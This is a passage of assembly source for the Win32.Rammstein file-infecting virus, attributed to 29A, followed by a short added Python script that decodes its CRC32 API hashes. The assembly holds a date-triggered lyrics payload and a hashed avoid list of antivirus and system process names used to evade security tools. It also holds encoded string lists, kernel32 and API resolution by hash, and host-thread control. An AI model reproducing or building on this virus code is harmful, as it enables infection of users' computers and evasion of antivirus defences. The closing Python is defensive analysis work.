;³ ÛÜÛ ÛÜÛ ÛÜÛ Û Û Û ÛÜÛ Û Û ;
;³ Û Û Û Û ÛÜÜ ÛÜÛ Û Û ÛÜß ;
;³ ;
;
DoPayload: ;
cmp [ebp+firstgen], 1 ;
jne do_it_now ;
ret ;
do_it_now: ;
pusha ;
lea esi, [ebp+text_start] ;
mov ecx, list_len ;
call not_list ;
;
lea eax, [ebp+text_start] ;
mov [ebp+current], eax ;
call [ebp+_GetDC], 0 ;
mov [ebp+hdc], eax ;
lea ebx, [ebp+offset chars] ;
call [ebp+_GetCharWidthA], eax, "A", "Z", ebx
lea ebx, [ebp+offset textmetric] ;
call [ebp+_GetTextMetricsA], [ebp+hdc], ebx ;
call [ebp+_GetSystemMetrics], SM_CXFULLSCREEN
mov [ebp+xmax], eax ;
call [ebp+_GetSystemMetrics], SM_CYFULLSCREEN
mov [ebp+ymax], eax ;
;
xor eax, eax ;
mov ax, [ebp+textmetric.tmHeight] ;
add ax, [ebp+textmetric.tmAscent] ;
add ax, [ebp+textmetric.tmDescent] ;
shl eax, 1 ;
mov [ebp+ylength], eax ;
;
new_window: ;
mov edi, [ebp+current] ;
call [ebp+_lstrlen], edi ;
add edi, eax ;
inc edi ;
push eax ;
call [ebp+_lstrlen], edi ;
mov edi, [ebp+current] ;
cmp eax, [esp] ;
jb ok_len ;
add edi, [esp] ;
inc edi ;
xchg eax, [esp] ;
;
ok_len: ;
pop ecx ;
;
lea esi, [ebp+chars] ;
xchg edi, esi ;
mov [ebp+xlength], 0 ;
xor eax, eax ;
;
calculate_length: ;
lodsb ;
cmp al, "A" ;
jnb do_Z ;
;
estimate: ;
xor ebx, ebx ;
mov bx, [ebp+textmetric.tmAveCharWidth] ;
inc ebx ;
jmp compute ;
;
do_Z: cmp al, "Z" ;
jna do_chars ;
jmp estimate ;
;
do_chars: ;
sub eax, "A" ;
mov ebx, [edi+eax*4] ;
inc ebx ;
;
compute: ;
add [ebp+xlength], ebx ;
loop calculate_length ;
;
call [ebp+_GetModuleHandleA], 0 ; get our handle
mov [ebp+hInst], eax ; save it
;
mov [ebp+wc.wcxStyle], CS_HREDRAW+CS_VREDRAW+\;window style
CS_GLOBALCLASS+CS_NOCLOSE
lea eax, [ebp+offset WndProc] ;
mov [ebp+wc.wcxWndProc], eax ; window procedure
mov [ebp+wc.wcxClsExtra], 0 ; -
mov [ebp+wc.wcxWndExtra], 0 ; -
mov eax, [ebp+hInst] ;
mov [ebp+wc.wcxInstance], eax ; instance (handle)
;
call [ebp+_LoadIconA], [ebp+hInst], IDI_APPLICATION ; load our icon
mov [ebp+ourhIcon], eax ;
mov [ebp+wc.wcxIcon], eax ;
mov [ebp+wc.wcxSmallIcon], eax ;
;
call [ebp+_LoadCursorA], 0, IDC_ARROW ; load our cursor
mov [ebp+wc.wcxCursor], eax ;
;
mov [ebp+wc.wcxBkgndBrush], COLOR_WINDOW+1 ;
mov dword ptr [ebp+wc.wcxMenuName], NULL ; menu
lea eax, [ebp+szClassName] ;
mov dword ptr [ebp+wc.wcxClassName], eax ; class name
;
lea eax, [ebp+offset wc] ;
call [ebp+_RegisterClassExA], eax ; register the class!
;
mov eax, [ebp+xmax] ;
sub eax, [ebp+xlength] ;
call brandom32 ;
mov [ebp+xpos], eax ;
;
mov eax, [ebp+ymax] ;
sub eax, [ebp+ylength] ;
call brandom32 ;
mov [ebp+ypos], eax ;
;
lea eax, [ebp+offset szClassName] ;
lea ebx, [ebp+offset szTitleName] ;
call [ebp+_CreateWindowExA],ExtendedStyle,\; Create the Window!
eax,\ ;
ebx,\ ;
DefaultStyle,\ ;
[ebp+xpos],\ ;
[ebp+ypos],\ ;
[ebp+xlength],\ ;
[ebp+ylength],\ ;
0,\ ;
0,\ ;
[ebp+hInst],\ ;
0 ;
;
mov [ebp+newhwnd], eax ; save handle
;
call [ebp+_UpdateWindow], dword ptr [ebp+newhwnd]; and update it...
call [ebp+_InvalidateRect], dword ptr [ebp+newhwnd], 0, 0
;
msg_loop: ;
lea eax, [ebp+offset msg] ;
call [ebp+_GetMessageA], eax, 0, 0, 0 ; get a message
;
or ax, ax ; finish?
jz end_loop ;
;
lea eax, [ebp+offset msg] ;
call [ebp+_TranslateMessage], eax ; translate message
;
lea eax, [ebp+offset msg] ;
call [ebp+_DispatchMessageA], eax ; dispatch the message
;
jmp msg_loop ; do again
;
end_loop: ;
mov esi, [ebp+current] ;
@endsz ;
@endsz ;
lea eax, [ebp+offset text_end] ;
cmp esi, eax ;
jae finish_process ;
cmp [ebp+process_end], 1 ;did the victim finish?
je finish_process ;
mov [ebp+current], esi ;
jmp new_window ;
;
finish_process: ;
popa ;
ret ;
process_end dd 0 ;
;
;============================================================================
WndProc proc uses ebx edi esi,\ ; registers preserved
hwnd:DWORD, wmsg:DWORD, wparam:DWORD, lparam:DWORD ; parameters
LOCAL theDC:DWORD ;
;
call @@1 ;
@@1: ;
pop esi ;
sub esi, offset @@1 ;
;
cmp [wmsg], WM_PAINT ;
je wmpaint ;
cmp [wmsg], WM_DESTROY ; destroy window
je wmdestroy ;
cmp [wmsg], WM_CREATE ; create window
je wmcreate ;
cmp [wmsg], WM_TIMER ;
jmp defwndproc ;
;
defwndproc: ;
call [esi+_DefWindowProcA], [hwnd], [wmsg], [wparam], [lparam] ; define
jmp finish ; the window
;
wmdestroy: ;
call [esi+_ShowWindow], [hwnd], SW_HIDE ;
call [esi+_KillTimer], [hwnd], [esi+htimer];
call [esi+_PostQuitMessage], 0 ; kill the window
xor eax, eax ;
jmp finish ;
;
wmpaint: ;
call [esi+_GetDC], [hwnd] ;
mov [theDC], eax ;
lea eax, [esi+offset lppaint] ;
call [esi+_BeginPaint], dword ptr [hwnd],\ ;
eax ;
push [esi+current] ;
call [esi+_lstrlen] ;
push eax ;
call [esi+_TextOutA], dword ptr [theDC], 1, 1,\
dword ptr [esi+current], eax;
pop eax ;
mov ebx, [esi+current] ;
add ebx, eax ;
inc ebx ;
push ebx ;
push ebx ;
call [esi+_lstrlen] ;
pop ebx ;
xor edx, edx ;
mov dx, [esi+textmetric.tmHeight] ;
call [esi+_TextOutA], dword ptr [theDC], 1, edx, ebx, eax
lea eax, [esi+offset lppaint] ;
call [esi+_EndPaint], dword ptr [hwnd], eax
jmp defwndproc ;
;
wmcreate: ;
lea eax, [esi+offset TimerProc] ;
call [esi+_SetTimer], dword ptr [hwnd], 1111h,\
dword ptr [esi+wintime],\ ;
eax ;
mov [esi+htimer], eax ;
jmp defwndproc ;
;
finish: ;
ret ;
WndProc endp ;
;
TimerProc proc uses ebx edi esi,\ ;
hwnd:DWORD, wmsg:DWORD, timerid:DWORD, dwtime:DWORD
;
call @@2 ;
@@2: ;
pop esi ;
sub esi, offset @@2 ;
;
mov eax, [esi+htimer] ;
cmp [timerid], eax ;
jne exittime ;
call [esi+_PostMessageA], [hwnd], WM_DESTROY, 0, 0
;
exittime: ;
ret ;
TimerProc endp ;
;
text_start: ;
noter <LA? MICH DEINE TRANE REITEN> ;
noter <UBERS KINN NACH AFRIKA> ;
;
noter <WIEDER IN DEN SCHOSS DER LOWIN> ;
noter <WO ICH EINST ZUHAUSE WAR> ;
;
noter <ZWISCHEN DEINE LANGEN BEINEN> ;
noter <SUCH DEN SCHNEE VOM LETZTEN JAHR> ;
;
noter <DOCH ES IST KEIN SCHNEE MEHR DA> ;
noter <..> ;
;
noter <LASS MICH DEINE TRANE REITEN> ;
noter <UBER WOLKEN OHNE GLUCK> ;
;
noter <DER GROSSE VOGEL SCHIEBT DEN KOPF> ;
noter <SANFT IN SEIN VERSTECK ZURUCK> ;
;
noter <ZWISCHEN DEINE LANGEN BEINEN> ;
noter <SUCH DEN SAND VOM LETZTEN JAHR> ;
;
noter <DOCH ES IST KEIN SAND MEHR DA> ;
noter <..> ;
;
noter <SEHNSUCHT VERSTECKT > ;
noter <SICH WIE EIN INSEKT> ;
;
noter <IM SCHLAFE MERKST DU NICHT> ;
noter <DA? ES DICH STICHT> ;
;
noter <GLUCKLICH WERD ICH NIRGENDWO> ;
noter <DER FINGER RUTSCHT NACH MEXIKO> ;
;
noter <DOCH ER VERSINKT IM OZEAN> ;
noter <SEHNSUCHT IST SO GRAUSAM> ;
;
noter <WOLLT IHR DAS BETT IN FLAMMEN SEHEN? > ;
noter <WOLLT IHR IN HAUT UND HAAREN UNTERGEHEN?>
;
noter <IHR WOLLT DOCH AUCH DEN DOLCH INS LAKEN STECKEN >
noter <IHR WOLLT DOCH AUCH DAS BLUT VOM DEGEN LECKEN >
;
noter <RAMMSTEIN!! RAMMSTEIN!! > ;
noter <RAMMSTEIN!! RAMMSTEIN!! > ;
;
noter <IHR SEHT DIE KREUZE AUF DEM KISSEN > ;
noter <IHR MEINT EUCH DARF DIE UNSCHULD KUSSEN >
;
noter <IHR GLAUBT ZU TOTEN WARE SCHWER > ;
noter <DOCH WO KOMMEN ALL DIE TOTEN HER > ;
;
noter <RAMMSTEIN!! RAMMSTEIN!! > ;
noter <RAMMSTEIN!! RAMMSTEIN!! > ;
;
noter <SEX IST EIN SCHLACHT > ;
noter <LIEBE IST KRIEG > ;
;
noter <RAMMSTEIN!! RAMMSTEIN!! > ;
noter <RAMMSTEIN!! RAMMSTEIN!! > ;
text_end: ;
list_len = $-offset text_start ;
;
wc STD_WINDOW <size STD_WINDOW,0,0,0,0,0,0,0,0,0,0,0>
wintime dd 4000 ;
hInst dd 0 ;
hAccel dd 0 ;
htimer dd 0 ;
ourhIcon dd 0 ;
newhwnd dd 0 ;
msg MSGSTRUCT <?> ;
r RECT <?> ;
lppaint PAINTSTRUCT <?> ;
textmetric TEXTMETRIC <?> ;
xmax dd 0 ;
ymax dd 0 ;
xlength dd 0 ;
ylength dd 0 ;
xpos dd 0 ;
ypos dd 0 ;
current dd 0 ;
hdc dd 0 ;
chars dd "Z"-"A"+2 dup (0) ;
szTitleName db 'Win32.Rammstein', 0 ;
szClassName db 'RAMMSTEIN', 0 ;
;
DefaultStyle = WS_OVERLAPPED+WS_VISIBLE ;
ExtendedStyle = WS_EX_TOPMOST ;
;
;==================================================;=========================
;
ValidateFile: ;
; ESI = pointer to filename ;
ret
pusha ;
lea eax, [ebp+VF_ExceptionExit] ; Setup a SEH frame
push eax ;
push dword ptr fs:[0] ;
mov fs:[0], esp ;
;
call [ebp+_lstrlen], esi ;get the filename length
cmp eax, 256 ;is it too big?
ja invalid_file ;
mov ecx, eax ;
;
push ecx ;uppercase the name
call [ebp+_CharUpperBuffA], esi, ecx ;
pop ecx ;
;
@endsz ;go to its end
inc ecx ;
std ;
mov edi, esi ;and look backwards for
mov al,'\' ;the '\'
repnz scasb ;
mov esi, edi ;
or ecx, ecx ;
jz no_increase ;
inc esi ;if we found one, point it
inc esi ;
;
no_increase: ;
cld ;restore direction
lea edi, [ebp+offset avoid_list] ;our avoid list
;
search_next: ;
cmp byte ptr [edi], 0FFh ;last entry?
je all_names_ok ;
xor ebx, ebx ;
mov bl, [edi+4] ;get the name length
xor ecx, ecx ;
xchg byte ptr [esi+ebx], cl ;limit our string to the
push esi ;length with a 0
call StringCRC32 ;and compute a crc32 for
pop esi ;the piece...
xchg byte ptr [esi+ebx], cl ;restore filename
cmp eax, [edi] ;does it match?
je av_name_found ;
add edi, 5 ;get next...
jmp search_next ;
;
av_name_found: ;
invalid_file: ;
pop dword ptr fs:[0] ;and restore the SEH
add esp, 4 ;
popa ;
stc ;
ret ;
;
all_names_ok: ;
pop dword ptr fs:[0] ;and restore the SEH
add esp, 4 ;
popa ;
clc ;
ret ;
;
VF_ExceptionExit: ;if we had an error we
mov esp, [esp+8] ;must restore the ESP
call DeltaRecoverVF ;
DeltaRecoverVF: ;
pop ebp ;
sub ebp, offset DeltaRecoverVF ;
jmp invalid_file ;
;
avoid_list: ;
crc32 <AV> ;
db 3 ;
crc32 <_AV> ;the list with filenames
db 3 ;to avoid
crc32 <ALERT> ;
db 5 ;
crc32 <AMON> ;
db 4 ;
crc32 <N32> ;
db 3 ;
crc32 <NOD> ;
db 3 ;
crc32 <NPSSVC> ;
db 6 ;
crc32 <NSCHEDNT> ;
db 8 ;
crc32 <NSPLUGIN> ;
db 8 ;
crc32 <TB> ;
db 2 ;
crc32 <F-> ;
db 2 ;
crc32 <AW> ;
db 2 ;
crc32 <AV> ;
db 2 ;
crc32 <NAV> ;
db 3 ;
crc32 <PAV> ;
db 3 ;
crc32 <RAV> ;
db 3 ;
crc32 <NVC> ;
db 3 ;
crc32 <FPR> ;
db 3 ;
crc32 <DSS> ;
db 3 ;
crc32 <IBM> ;
db 3 ;
crc32 <INOC> ;
db 3 ;
crc32 <ANTI> ;
db 3 ;
crc32 <SCN> ;
db 3 ;
crc32 <SCAN> ;
db 4 ;
crc32 <VSAF> ;
db 3 ;
crc32 <VSWP> ;
db 3 ;
crc32 <PANDA> ;
db 3 ;
crc32 <DRWEB> ;
db 3 ;
crc32 <FSAV> ;
db 3 ;
crc32 <SPIDER> ;
db 3 ;
crc32 <ADINF> ;
db 3 ;
crc32 <EXPLORER> ;
db 8 ;
crc32 <SONIQUE> ;
db 7 ;
crc32 <SQSTART> ;
db 7 ;
crc32 <SMSS> ;
db 4 ;
crc32 <OUTLOOK> ;
db 7 ;
crc32 <PSTORES> ;
db 7 ;
db 0FFh ;
;
;
not_list proc ;
____1: cmp [ebp+copying], 1 ;synchronization
je ____1 ;
mov [ebp+in_list], 1 ;
push esi edi ;this NOTs a list
mov edi, esi ;
not_byte: ;
lodsb ;
not al ;
stosb ;
loop not_byte ;
pop edi esi ;
mov [ebp+in_list], 0 ;
ret ;
not_list endp ;
in_list db 0 ;
;
brandom32 proc ;this bounds eax
push edx ;between 0 and eax-1
push ecx ;on random basis
mov edx, 0 ;
push eax ;
call random32 ;
pop ecx ;
div ecx ;
xchg eax, edx ;
pop ecx ;
pop edx ;
ret ;
brandom32 endp ;
;
random32 proc ;this is a random nr
push edx ;generator. It's a
call [ebp+_GetTickCount] ;modified version of
rcl eax, 2 ;some random gen I found
add eax, 12345678h ;someday and it had
random_seed = dword ptr $-4 ;some flaws I fixed...
adc eax, esp ;
xor eax, ecx ;
xor [ebp+random_seed], eax ;
add eax, [esp-8] ;
rcl eax, 1 ;
pop edx ;
ret ;
random32 endp ;
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
check_not proc ;
pusha ;Be sure not to let
lea esi, [ebp+list_of_lists] ;some of the lists
;un-NOTed in the
get_another: ;victim file
lodsd ;
or eax, eax ;
jz correct ;
add eax, [ebp+finaldestination] ;
cmp byte ptr [eax], NOT "L" ;
je no_problem ;
call wrong ;
;
no_problem: ;
add esi, 4 ;
jmp get_another ;
;
correct: ;
popa ;
ret ;
;
wrong: ;
pusha ;
push eax ;
lodsd ;
pop esi ;
mov ecx, eax ;
call not_list ;
popa ;
ret ;
check_not endp ;
;
list_of_lists label ;
dd offset direct_list - offset start, direct_list_len
dd offset file_extensions - offset start, file_extensions_len
dd offset av_list - offset start, av_list_len
dd 0 ;
;
KillThread: ;
IF VIRUSNOTIFYEXIT ;
push 0 ;
call exittext1 ;
db 'Rammstein viral code end!', 0 ;
exittext1: ;
call exittext2 ;
db 'Rammstein viral code end!', 0 ;
exittext2: ;
push 0 ;
call [ebp+_MessageBoxA] ;
ENDIF ;
IF PAYLOAD ;
lea eax, [ebp+time] ;
call [ebp+_GetSystemTime], eax ;
lea edi, [ebp+time] ;
cmp word ptr [edi.ST_wDay], 14d ;
jne no_payload ;
call DoPayload ;
;
no_payload: ;
ENDIF ;
;
IF MAINTHREADSEH ;
jmp restore_main_seh ;host
;
MainExceptionExit: ;if we had an error we
mov esp, [esp+8] ;must restore the ESP
;
restore_main_seh: ;
pop dword ptr fs:[0] ;and restore the SEH
add esp, 4 ;returning to the host...
;
call restore_delta ;
restore_delta: ;
pop ebp ;
sub ebp, offset restore_delta ;
;
just_kill_it: ;
ENDIF
mov eax, [ebp+_ExitThread] ;Exit the main thread
push 0 ;
call eax ;
;
; Safe Copro. Thanx to Prizzy for pointing me that the copro cannot be shared
; in the same process and need to be saved to keep compatibility!
InitCopro: ;
sub esp, 128 ;create space for copro
fwait ;data, wait for last to
fnsave [esp] ;finish and save...
finit ;initialize copro
jmp dword ptr [esp+80h] ;and return
;
RestoreCopro: ;
fwait ;wait to finish
frstor [esp+4] ;restore copro data
xchg eax, dword ptr [esp] ;now find out our return
xchg eax, dword ptr [esp+80h] ;address without altering
xchg eax, dword ptr [esp] ;eax, kill the copro space
add esp, 128 ;on the stack. One Dword
ret ;remains on the stack
;
EPO_Routine: ;
clc ;
ret ;
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
; Data area ;
test_semaphore dd 0 ;
W32FD WIN32_FIND_DATA <?> ;
time SYSTEMTIME <0> ;
memory dd 0 ;
free_routine dd AVAILABLE ;
version db 0 ;
newsize dd 0 ;
newraw dd 0 ;
situation dd 0 ;
DeltaRVA dd 0 ;
mainthreadid dd 0 ;
headersum dd 0 ;
checksumfile dd 0 ;
lowest_section_raw dd 0 ;
apihookfinish dd 0 ;
tempcounter dd 0 ;
fileopen dd 0 ;
Semaphore db "Win32.Rammstein", 0 ;
saved_code dd 0, 0 ;
mmx dd 0 ;
skipper db 0 ;
no_imports db 0 ;
totalsizes dd 0 ;
smallest_dir_va dd 0 ;
netapis dd 0 ;
ok dd 0
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
include get_apis.inc ;included files
include rammdata.inc ;
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
virussize = end-start ;
copyright db 'Win32.Rammstein.' ;
db virussize/10000 mod 10 + '0' ;
db virussize/01000 mod 10 + '0' ;
db virussize/00100 mod 10 + '0' ;
db virussize/00010 mod 10 + '0' ;
db virussize/00001 mod 10 + '0' ;
db ' v4.0', 10,13 ;
db '(c) Lord Julus - 2000 / [29A]',10,13 ;
MainThread endp ;
end2: ;
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
IF DEBUG ;
debug_end db 'Here is the end of the virus.',0 ;
ENDIF ;
end label ;
end start ;
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[RAMM.ASM]ÄÄÄ
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[GET_APIS.ASM]ÄÄÄ
; Locating modules and their exported api addresses routines
;
; Deluxe V2.0 ;-)
;
; (C) Lord Julus / [29A]
;
; This includes the jp/lapse/vecna crc32 macro calculator and the api
; getter is modified to search for the crc32 instead of names. Saves space
; and makes it harder to detect.
;ÛßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßÛ
;Û Locate Kernel32 base address Û
;ÛÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÛ
;
; Entry: EAX = dword on stack at startup
; EDX = pointer to kernel32 name
;
; Return: EAX = base address of kernel32 if success
; EAX = 0, CF set if fail
LocateKernel32 proc near
pushad ; save all registers
call @800 ; ...I don't know why I
@800: pop ebx ; had to do this this way,
add ebx, delta3-@800+1 ; but it wouldn't work
mov dword ptr [ebx], ebp ; otherwise...
;
lea ebx, [ebp+try_method_2_error] ; first set up a seh
push ebx ; frame so that if our
push dword ptr fs:[0] ; first method crashes
mov fs:[0], esp ; we will find ourselves
; in the second method
locateloop: ;
cmp dword ptr [eax+0b4h], eax ; first method looks for
je found_k32_kill_seh ; the k32 by checking for
dec eax ; the equal dword at 0b4
cmp eax, 40000000h ;
jbe try_method_2 ;
jmp locateloop ;
;
found_k32_kill_seh: ; if we found it, then we
pop dword ptr fs:[0] ; must destroy the temp
add esp, 4 ; seh frame
mov [esp.pop_eax], eax ;
jmp found_k32 ;
;
try_method_2_error: ; if the first method gave
mov esp, [esp+8] ; an exception error we
delta3: mov ebp, 12345678h ; restore the stack and
; the delta handle
try_method_2: ;
pop dword ptr fs:[0] ; restore the seh state
add esp, 4 ;
popad ; restore registers and
pushad ; save them again
; and go on w/ method two
lea esi, [ebp+offset getmodulehandle] ;
mov ecx, getmodulehandlelen ;
call not_list ;
;
mov ebx, dword ptr [ebp+imagebase] ; now put imagebase in ebx
mov esi, ebx ;
cmp word ptr [esi], 'ZM' ; check if it is an EXE
jne notfound_k32 ;
mov esi, dword ptr [esi.MZ_lfanew] ; get pointer to PE
cmp esi, 1000h ; too far away?
jae notfound_k32 ;
add esi, ebx ;
cmp word ptr [esi], 'EP' ; is it a PE?
jne notfound_k32 ;
add esi, IMAGE_FILE_HEADER_SIZE ; skip header
mov edi, dword ptr [esi.OH_DataDirectory.DE_Import.DD_VirtualAddress]
add edi, ebx ; and get import RVA
mov ecx, dword ptr [esi.OH_DataDirectory.DE_Import.DD_Size]
add ecx, edi ; and import size
mov eax, edi ; save RVA
;
locateloop2: ;
mov edi, dword ptr [edi.ID_Name] ; get the name
add edi, ebx ;
xor dword ptr [edi], 'öDC2ETBRS' ;
cmp dword ptr [edi], 'NREK' xor 'öDC2ETBRS' ; and compare to KERN
xor dword ptr [edi], 'öDC2ETBRS' ;
je found_the_kernel_import ; if it is not that one
add eax, IMAGE_IMPORT_DESCRIPTOR_SIZE ; skip to the next desc.
mov edi, eax ;
cmp edi, ecx ; but not beyond the size
jae notfound_k32 ; of the descriptor
jmp locateloop2 ;
;
found_the_kernel_import: ; if we found the kernel
mov edi, eax ; import descriptor
mov esi, dword ptr [edi.ID_FirstThunk] ; take the pointer to
add esi, ebx ; addresses
mov edi, dword ptr [edi.ID_Characteristics] ; and the pointer to
add edi, ebx ; names
;
gha_locate_loop: ;
push edi ; save pointer to names
mov edi, dword ptr [edi.TD_AddressOfData] ; go to the actual thunk
add edi, ebx ;
add edi, 2 ; and skip the hint
;
push edi esi ; save these
lea esi, dword ptr [ebp+getmodulehandle] ; and point the name of
mov ecx, getmodulehandlelen ; GetModuleHandleA
rep cmpsb ; see if it is that one
je found_getmodulehandle ; if so...
pop esi edi ; otherwise restore
;
pop edi ; restore arrays indexes
add edi, 4 ; and skip to next
add esi, 4 ;
cmp dword ptr [esi], 0 ; 0? -> end of import
je notfound_k32 ;
jmp gha_locate_loop ;
;
found_getmodulehandle: ;
pop esi ; restore stack
pop edi ;
pop edi ;
;
lea esi, [ebp+offset getmodulehandle] ;
mov ecx, getmodulehandlelen ;
call not_list ;
;
push edx ; push kernel32 name
mov esi, [esi] ; esi = GetModuleHandleA
call esi ; address...
mov [esp.pop_eax], eax ;
or eax, eax ;
jz notfound_k32 ;
;
found_k32: ;
popad ; restore all regs and
clc ; and mark success
ret ;
;
notfound_k32: ;
popad ; restore all regs
xor eax, eax ; and mark the failure...
stc ;
ret ;
LocateKernel32 endp ;
@900 dd 0
;ÛßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßÛ
;Û Locate Apis Û
;ÛÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÛ
;
; Entry: EAX = base of module
; ESI = pointer to API name crc32 array
; EDX = pointer to array to receive API addresses
; ECX = how many apis to import
;
; Return: EAX = 0, CF set if fail
;ÛßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßÛ
;Û General module handle retrieving routine Û
;ÛÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÛ
;
; Entry: EDI = pointer to module name
;
; Return: EAX = module base address if success
; EAX = 0, CF set if fail
;ÛßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßÛ
;Û CRC32 computer for strings Û
;ÛÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÛ
push edx ;
mov edx, mCRC32_init ;
;
CRC32_next_byte: ;
lodsb ;
or al, al ;
jz CRC32_finish ;
xor dl, al ;
mov al, 08h ;
;
CRC32_next_bit: ;
shr edx, 01h ;
jnc CRC32_no_change ;
xor edx, mCRC32 ;
;
CRC32_no_change: ;
dec al ;
jnz CRC32_next_bit ;
jmp CRC32_next_byte ;
;
CRC32_finish: ;
xchg eax, edx ;
pop edx ;
ret ;
StringCRC32 endp ;
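The GET_APIS header explains that the API getter matches CRC32 values instead of names, and StringCRC32 above is the hash it uses. As an added analyst-side example that is not part of the 29A listing, the Python below mirrors that bit-serial CRC and applies it the way a defender does when triaging a sample with hashed imports: hash a candidate export list once and map the stored hash array back to names. mCRC32_init and mCRC32 are defined in a macro not shown on the page, so the standard reflected CRC-32 constants are assumed; the candidate list and the sample hash array are constructed here from names that appear in the listing.

```python
"""Recover API names from CRC32-style hashes of the kind get_apis.inc compares.

Added example, not part of the original listing. The routine on the page XORs
each byte into the low 8 bits of the CRC register, shifts right eight times,
folds in the polynomial on every 1 bit that falls out, and returns the register
without a final inversion. The two constants below are assumptions: the page's
mCRC32_init and mCRC32 live in a macro that is not shown.
"""
import zlib

CRC32_INIT = 0xFFFFFFFF  # assumed value of mCRC32_init
CRC32_POLY = 0xEDB88320  # assumed value of mCRC32 (reflected IEEE polynomial)


def string_crc32(name: bytes, init: int = CRC32_INIT, poly: int = CRC32_POLY) -> int:
    """Bit-serial CRC of a NUL-free byte string, mirroring StringCRC32 (no final XOR)."""
    crc = init
    for b in name:
        crc ^= b                      # xor dl, al
        for _ in range(8):            # mov al, 8 / dec al loop
            lsb = crc & 1
            crc >>= 1                 # shr edx, 1
            if lsb:
                crc ^= poly           # jc -> xor edx, mCRC32
    return crc & 0xFFFFFFFF


def cross_check_with_zlib(data: bytes) -> bool:
    """Under the assumed constants the page's hash is zlib's CRC-32 minus the final XOR."""
    return string_crc32(data) == (zlib.crc32(data) ^ 0xFFFFFFFF)


def build_hash_table(export_names) -> dict:
    """Analyst's lookup table: hash -> export name, refusing silent collisions."""
    table = {}
    for name in export_names:
        h = string_crc32(name.encode("ascii"))
        if h in table and table[h] != name:
            raise ValueError(f"CRC32 collision between {table[h]} and {name}")
        table[h] = name
    return table


def resolve_hashes(hashes, table: dict) -> list:
    """Translate a stored hash array back into names; unknown values stay flagged."""
    return [table.get(h, f"unknown_{h:08x}") for h in hashes]


# Constructed candidate list: a subset of the kernel32 names hashed in the listing.
KERNEL32_CANDIDATES = [
    "LoadLibraryA", "GetProcAddress", "ExitProcess", "CreateThread",
    "CreateFileA", "CreateFileMappingA", "MapViewOfFile", "FindFirstFileA",
    "FindNextFileA", "GetTickCount", "GetModuleHandleA", "WinExec",
]

# Constructed stand-in for a hash array carved out of a sample.
SAMPLE_HASH_ARRAY = [
    string_crc32(n.encode("ascii")) for n in ("GetProcAddress", "CreateFileA", "WinExec")
]


def demo() -> list:
    """Resolve the constructed array plus one value that matches nothing."""
    table = build_hash_table(KERNEL32_CANDIDATES)
    return resolve_hashes(SAMPLE_HASH_ARRAY + [0], table)


if __name__ == "__main__":
    for h, n in zip(SAMPLE_HASH_ARRAY + [0], demo()):
        print(f"{h:08x}  {n}")
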